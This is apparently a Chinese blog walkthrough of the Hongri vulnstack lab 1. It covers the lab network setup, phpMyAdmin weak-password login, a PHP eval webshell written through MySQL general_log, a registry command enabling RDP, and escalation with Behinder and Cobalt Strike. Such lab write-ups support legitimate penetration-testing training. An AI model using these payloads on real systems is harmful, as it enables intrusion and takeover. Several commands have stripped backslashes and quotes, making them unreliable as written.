红日靶场系列,红日靶场1


环境搭建:

靶场下载

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机通用密码: hongrisec@2019 登进去要修改密码,改为 HONGRISEC@2019

网卡配置

保证kali和本机可以访问win7,给win7配置两块网卡,让win7既可以访问外网,也可以访问内网 按照拓扑图搭建环境: 攻击机: kali ip: 192.168.70.128 靶机: win7 外网ip:192.168.70.129 内网ip:192.168.52.128 win03 ip: 192.168.52.141 win08 ip: 192.168.52.138

在win7上使用phpstudy开启web服务

外网渗透

信息收集;

先对win7进行常见端口扫描,可以看到开了两个服务,80端口的http服务和3306端口的mysql服务 一般看到MySQL就会想到phpmyadmin,然后弱口令试一下,搞一下目录扫描 直接用kali自带的dirb,发现70个结果,有很多phpmyadmin的目录,phpinfo.php

提权:

访问phpmyadmin,root/root 进入后台 没有发现什么有价值的东西,从phpinfo中可以看到网站的绝对路径,配合phpmyadmin尝试一下写入webshell

select <?php @eval($_POST[cmd])?>INTO OUTFILE C:phpStudyWWWshell.php

果然,无法写入,因为secure_file_priv的值为null ,表示限制mysql不允许导入|导出 换个思路,这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。

执行
SHOW VARIABLES LIKE general%

开启它,设置general_log为on,并且把日志存放路径设置为网站根目录,这样就可以写入shell了

set global general_log = "ON";
SET global general_log_file=C:/phpStudy/WWW/shell.php;

更改后 写入shell

select <?php eval($_POST[cmd]);?>;

冰蝎连接

内网渗透

查看当前权限 远程登录 手动开启3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看端口状态

添加用户

使用冰蝎反弹shell到kali 参考这个:

https://blog..net/weixin_45745344/article/details/112321742

使用CS生成木马,通过冰蝎上传到服务器,看到权限为administrator,这里记得把回连时间改为0 使用插件梼杌进行权限提升,权限变成了system 域的话依然可以使用CS进行提权 结束

经验分享 程序员 微信小程序 职场和发展